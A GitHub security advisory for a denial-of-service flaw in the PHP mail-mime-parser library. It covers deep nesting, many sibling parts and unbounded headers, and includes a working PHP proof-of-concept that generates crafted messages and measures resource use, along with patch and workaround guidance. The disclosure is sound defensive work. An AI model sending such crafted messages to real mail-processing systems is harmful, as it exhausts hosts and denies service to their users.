GHSA-f6v3-2qmr-vfjx: High severity composer/zbateson/mail-mime-parser vulnerability
Impact
An uncontrolled resource consumption / algorithmic complexity vulnerability affecting any application that parses untrusted email with this library.
Three independent parsing paths are super-linear in cost, so a byte-size cap on the caller side does not bound the work done. A crafted message under 2 MB can consume seconds of CPU or hundreds of megabytes to multiple gigabytes of memory (leading to an out-of-memory kill), enabling denial of service. The parse is lazy, but the cost is paid on the first getAllParts() or content read.
Details
1. Deep multipart nesting is O(depth²). MimeParserService::findContentBoundary() tests each content line against the current part and every ancestor via the recursive ParserMimePartProxy::setEndBoundaryFound(), so a nesting depth of D costs 1 + 2 + … + D comparisons. A ~600 KB message nested ~10,000 deep does not finish parsing in a minute. 2. Many sibling parts is O(n²). PartChildrenContainer::add() appends each child with arraysplice($children, count($children), 0, [$part]), which reindexes the entire array on every call. The same container backs UUEncoded begin parts via NonMimeParserService. 3. Header buffering is unbounded. HeaderParserService::parse() reads header lines up to a blank line with no limit on header count or total size, so a few megabytes of header lines can hold hundreds of megabytes resident; a ~5 MB message of headers can reach multiple gigabytes and be OOM-killed.
Proof of concept
php composer require zbateson/mail-mime-parser
<?php require 'vendor/autoload.php'; use ZBateson\MailMimeParser\MailMimeParser;
function nestedMessage(int $depth): string { $head = ''; $tail = ''; for ($i = 0; $i < $depth; $i++) { $head .= "Content-Type: multipart/mixed; boundary=b$i\r\n\r\n--b$i\r\n"; } return $head . "Content-Type: text/plain\r\n\r\nx\r\n" . $tail; } function siblingMessage(int $n): string { return "Content-Type: multipart/mixed; boundary=b\r\n\r\n" . strrepeat("--b\r\nContent-Type: text/plain\r\n\r\nx\r\n", $n) . "--b--\r\n"; } function headerMessage(int $n): string { return "From: a@b\r\n" . strrepeat("X-H: v\r\n", $n) . "\r\nbody\r\n"; } function measure(string $label, string $raw): void { $t = microtime(true); count((new MailMimeParser())->parse($raw, false)->getAllParts()); printf("%-22s input=%5.2f MB time=%6.2f s peak=%6.1f MB\n", $label, strlen($raw) / 1048576, microtime(true) - $t, memorygetpeakusage(true) / 1048576); }
measure('nesting depth=2000', nestedMessage(2000)); measure('siblings=50000', siblingMessage(50000)); measure('headers=300000', headerMessage(300000));
Run with a raised memory limit so the header case does not abort early:
php -d memorylimit=2048M poc.php // nesting depth=2000 input= 0.13 MB time= 2.08 s peak= 30.0 MB // siblings=50000 input= 1.72 MB time= 5.11 s peak= 276.0 MB // headers=300000 input= 2.29 MB time= 0.40 s peak= 380.3 MB
Patches
Fixed in 4.0.2 and 3.0.6. The fixes add configurable limits on multipart nesting depth and on header count / total header size (recording a parse error past the threshold rather than throwing), and change sibling append to O(n). Users should upgrade to one of these (or later) versions.
Versions 2.x are also affected but are end-of-life and will not receive patches; users on those lines should upgrade to a fixed release. (Versions prior to 2.0 used a different parser and are not affected by all three paths.)
Workarounds
These costs are super-linear, so an input byte-size cap alone does not bound them. Until upgrading, restrict exposure of the parser to untrusted input, and run parsing under a constrained memorylimit and execution time limit so a malicious message fails its own request rather than exhausting the host.
- Found and reported privately by Ilia Alshanetsky (@iliaal), who also proposed fixes that informed the patches.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
composer/zbateson/mail-mime-parserto a version that resolves this vulnerability.Fixed in 4.0.2 - Upgrade
Upgrade
composer/zbateson/mail-mime-parserto a version that resolves this vulnerability.Fixed in 3.0.6 - Upgrade
Upgrade
zbateson/mail-mime-parserto a version that resolves this vulnerability.Fixed in 4.0.2 - Upgrade
Upgrade
zbateson/mail-mime-parserto a version that resolves this vulnerability.Fixed in 3.0.6 - Compensating control
Until upgrading, restrict the parser's exposure to untrusted input and run parsing under a constrained memory_limit and execution time limit so malicious messages fail their own request rather than exhausting the host.
Event History
Frequently Asked Questions
Which applications are exposed?
Any application that parses untrusted email using composer/zbateson/mail-mime-parser is affected. The issue can be triggered through crafted messages that exercise multipart nesting, large numbers of sibling parts, or UUEncoded begin parts.
Does limiting the maximum email size prevent exploitation?
No. A caller-side byte-size cap does not bound the parsing work; a crafted message under 2 MB can consume seconds of CPU or hundreds of megabytes to multiple gigabytes of memory.
When is the resource cost incurred?
Parsing is lazy, but the cost is incurred when the application first calls getAllParts() or reads content. Systems that accept messages but never enumerate parts or read their content may not trigger the expensive parsing path.
Does exploitation require authentication or user interaction?
The supplied CVSS vector indicates network attackability with low complexity and no required privileges or user interaction. An unauthenticated attacker can therefore target a reachable email-processing workflow that parses attacker-controlled messages.